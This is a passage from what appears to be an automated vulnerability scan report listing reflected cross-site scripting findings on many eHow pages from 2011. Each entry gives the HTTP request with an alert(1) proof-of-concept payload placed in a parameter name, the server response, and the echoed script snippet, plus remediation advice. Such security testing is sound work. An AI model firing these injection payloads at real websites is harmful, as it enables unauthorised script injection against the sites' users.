The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1122d'-alert(1)-'dc35503d8e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fitness/?1122d'-alert(1)-'dc35503d8e3=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71761
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fitness - How To Information | eHow.com</title>
1.378. http://www.ehow.com/food-and-drink/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /food-and-drink/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc0e'-alert(1)-'5a32fd4a744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /food-and-drink/?7dc0e'-alert(1)-'5a32fd4a744=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73340
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Food & Drink - How To Information | eHow.com</tit ...[SNIP]... <fb:like href="http://www.ehow.com/food-and-drink/?7dc0e'-alert(1)-'5a32fd4a744=1" ref="like" width="300"> ...[SNIP]...
1.379. http://www.ehow.com/healthcare/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /healthcare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9aaa'-alert(1)-'75a70bf2071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthcare/?f9aaa'-alert(1)-'75a70bf2071=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71152
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Healthcare - How To Information | eHow.com</title
...[SNIP]...
<fb:like href="http://www.ehow.com/healthcare/?f9aaa'-alert(1)-'75a70bf2071=1" ref="like" width="300">
...[SNIP]...
1.380. http://www.ehow.com/healthy-living/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /healthy-living/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f38f'-alert(1)-'8c7b03448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthy-living/?9f38f'-alert(1)-'8c7b03448=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68271
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Healthy Living - How To Information | eHow.com</t
...[SNIP]...
<fb:like href="http://www.ehow.com/healthy-living/?9f38f'-alert(1)-'8c7b03448=1" ref="like" width="300">
...[SNIP]...
1.381. http://www.ehow.com/hobbies-and-science/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /hobbies-and-science/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e398d'-alert(1)-'06fc955b57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hobbies-and-science/?e398d'-alert(1)-'06fc955b57a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72225
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Hobbies & Science - How To Information | eHow.com
...[SNIP]...
<fb:like href="http://www.ehow.com/hobbies-and-science/?e398d'-alert(1)-'06fc955b57a=1" ref="like" width="300">
...[SNIP]...
1.382. http://www.ehow.com/holidays-and-celebrations/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /holidays-and-celebrations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 506ce'-alert(1)-'b3c6ff17c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /holidays-and-celebrations/?506ce'-alert(1)-'b3c6ff17c61=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:19 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73326
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Holidays & Celebrations - How To Information | eH
...[SNIP]...
<fb:like href="http://www.ehow.com/holidays-and-celebrations/?506ce'-alert(1)-'b3c6ff17c61=1" ref="like" width="300">
...[SNIP]...
1.383. http://www.ehow.com/home-building-and-remodeling/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /home-building-and-remodeling/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed847'-alert(1)-'467cb45ab89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-building-and-remodeling/?ed847'-alert(1)-'467cb45ab89=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72331
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Building & Remodeling - How To Information |
...[SNIP]...
<fb:like href="http://www.ehow.com/home-building-and-remodeling/?ed847'-alert(1)-'467cb45ab89=1" ref="like" width="300">
...[SNIP]...
1.384. http://www.ehow.com/home-design-and-decorating/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /home-design-and-decorating/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30749'-alert(1)-'96a91f5fd07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-design-and-decorating/?30749'-alert(1)-'96a91f5fd07=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72667
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Design & Decorating - How To Information | e
...[SNIP]...
<fb:like href="http://www.ehow.com/home-design-and-decorating/?30749'-alert(1)-'96a91f5fd07=1" ref="like" width="300">
...[SNIP]...
1.385. http://www.ehow.com/home-maintenance-and-repair/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /home-maintenance-and-repair/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9888d'-alert(1)-'5944bfd28d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-maintenance-and-repair/?9888d'-alert(1)-'5944bfd28d9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73411
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Maintenance & Repair - How To Information |
...[SNIP]...
<fb:like href="http://www.ehow.com/home-maintenance-and-repair/?9888d'-alert(1)-'5944bfd28d9=1" ref="like" width="300">
...[SNIP]...
1.386. http://www.ehow.com/home-safety-and-household-tips/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /home-safety-and-household-tips/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef6bc'-alert(1)-'0b251195974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-safety-and-household-tips/?ef6bc'-alert(1)-'0b251195974=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70494
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Safety & Household Tips - How To Information
...[SNIP]...
<fb:like href="http://www.ehow.com/home-safety-and-household-tips/?ef6bc'-alert(1)-'0b251195974=1" ref="like" width="300">
...[SNIP]...
1.387. http://www.ehow.com/housekeeping/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /housekeeping/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bd5'-alert(1)-'57433244f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housekeeping/?78bd5'-alert(1)-'57433244f77=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71760
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Housekeeping - How To Information | eHow.com</tit
...[SNIP]...
<fb:like href="http://www.ehow.com/housekeeping/?78bd5'-alert(1)-'57433244f77=1" ref="like" width="300">
...[SNIP]...
1.388. http://www.ehow.com/how_13299_know-someone-lying.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_13299_know-someone-lying.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcda3'-alert(1)-'e5bc67b4dc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_13299_know-someone-lying.html?dcda3'-alert(1)-'e5bc67b4dc4=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 81599
1.389. http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_2053743_make-crock-pot-pork-roast.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e87e0'-alert(1)-'d9cba84b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2053743_make-crock-pot-pork-roast.html?e87e0'-alert(1)-'d9cba84b7c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75941
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Crock Pot Pork Roast | eHow.com</ti
...[SNIP]...
<script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_2053743_make-crock-pot-pork-roast.html?e87e0'-alert(1)-'d9cba84b7c=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_2053743_make-crock-pot-po
...[SNIP]...
1.390. http://www.ehow.com/how_2077554_repair-cracks-dashboard.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_2077554_repair-cracks-dashboard.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcbd'-alert(1)-'5482c536ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2077554_repair-cracks-dashboard.html?6dcbd'-alert(1)-'5482c536ab0=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75255
1.391. http://www.ehow.com/how_2113353_end-sibling-feuds.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_2113353_end-sibling-feuds.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cb73'-alert(1)-'4756d1fe387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2113353_end-sibling-feuds.html?3cb73'-alert(1)-'4756d1fe387=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87744
1.392. http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_2304056_cut-shirt-make-cuter.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b04'-alert(1)-'39477125765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2304056_cut-shirt-make-cuter.html?a4b04'-alert(1)-'39477125765=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76783
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Cut a T Shirt To Make It Cuter | eHow.com<
...[SNIP]...
<script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_2304056_cut-shirt-make-cuter.html?a4b04'-alert(1)-'39477125765=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_2304056_cut-shirt-make-cu
...[SNIP]...
1.393. http://www.ehow.com/how_3815_minutes-business-meeting.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /how_3815_minutes-business-meeting.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2374'-alert(1)-'6994478717a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_3815_minutes-business-meeting.html?a2374'-alert(1)-'6994478717a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
